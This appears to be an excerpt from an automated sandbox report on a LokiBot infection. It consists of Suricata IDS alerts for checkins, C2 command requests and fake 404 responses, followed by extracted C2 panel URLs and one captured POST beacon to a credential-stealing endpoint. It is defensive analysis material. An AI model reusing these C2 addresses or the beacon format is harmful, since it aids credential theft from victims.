Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49783 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49811 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49705 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49736
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49811 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49811 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49815 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49705
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49814 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49783 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49783 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49809
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49760 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49760 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49783 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49783 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49812 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49811 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49812 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49811 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49730
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49759
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49702 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49812 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49702 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49812 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49804 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49812
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49816 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49816 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49760
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49816 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49815 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49815 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49710
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49816 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49804 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49837 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49810 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49810 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49837 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49810 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49815 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49816 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49815 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49837 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49739 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49814 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49810 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49815
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49804 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49816
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49814 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49783
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49765
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49814 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49814 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49810 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49814
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49837 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49837 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49820 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49820 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49820 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49801 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49770 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49770 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49740 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49740 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49768 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49768 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49740 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49770 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49804 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49820 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49821 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49792 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49792 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49744
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49792 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49837
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49770 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49820 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49770 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49731
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49818 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49818 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49818 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49768 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49840 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49818 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49804
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49792 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49820
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49818 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49792 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49798 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49798 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49818
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49792
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49831 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49831 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49801
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49823 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49823 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49823 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49841 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49841 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49841 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49823 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49823 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49841 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49841 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49840 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49810
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49840 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49841
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49778 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49778 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49778 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49768 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49768 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49840 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49702 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49702 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49706
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49739
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49768
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49702
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49821 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49718 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49718 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49708 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49831 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49708 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49821 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49729 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49770
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49729 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49729 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49821 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49821 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49823
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49775 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49775 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49808 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49775 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49840 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49838
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49775 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49738
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49781 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49781 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49781 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49781 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49781 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49807 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49781
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49807 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49807 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49811
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49807 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49718 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49798 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49831 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49842 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49842 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49831 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49798 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49798 -> 188.114.97.3:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://dddotx.shop/Mine/PWS/fre.php

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close
